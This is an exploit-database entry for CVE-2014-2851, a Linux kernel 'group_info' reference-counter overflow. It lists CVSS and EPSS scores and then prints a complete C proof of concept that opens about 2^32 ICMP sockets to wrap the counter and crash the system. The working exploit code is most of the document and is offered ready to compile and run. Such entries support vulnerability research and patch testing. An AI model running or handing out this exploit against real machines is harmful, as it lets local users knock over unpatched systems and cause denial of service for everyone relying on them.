Linux Kernel - 'group_info' refcounter Overflow Memory Corruption

2014-04-1800:00:00

Thomas Pollet

www.exploit-db.com

6.8 Medium

AI Score

Confidence

High

6.9 Medium

CVSS2

Access Vector

LOCAL

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:L/AC:M/Au:N/C:C/I:C/A:C

0.001 Low

EPSS

Percentile

25.7%

JSON

/*
 * DoS poc for CVE-2014-2851
 * Linux group_info refcounter overflow memory corruption
 *
 * https://lkml.org/lkml/2014/4/10/736
 *
 * @Tohmaxx - http://thomaspollet.blogspot.be
 *
 * If the app doesn't crash your system, try a different count (argv[1])
 * Execution takes a while because 2^32 socket() calls
 *
 */

#include <arpa/inet.h>
#include <stdio.h>
#include <sys/socket.h>
int main(int argc, char *argv[]) {
    int i ;
    struct sockaddr_in saddr;
    unsigned count = (1UL<<32) - 20 ;
    if(argc >= 2){
        // Specify count
        count = atoi(argv[1]);
    }
    printf("count 0x%x\n",count);
    for(i = 0 ; (unsigned)i < count;i++ ){
        socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
        if ( i % ( 1 << 22 ) == 0 )
            printf("%i \n",i);
    }
    //Now make it wrap and crash:
    system("/bin/echo bye bye");
}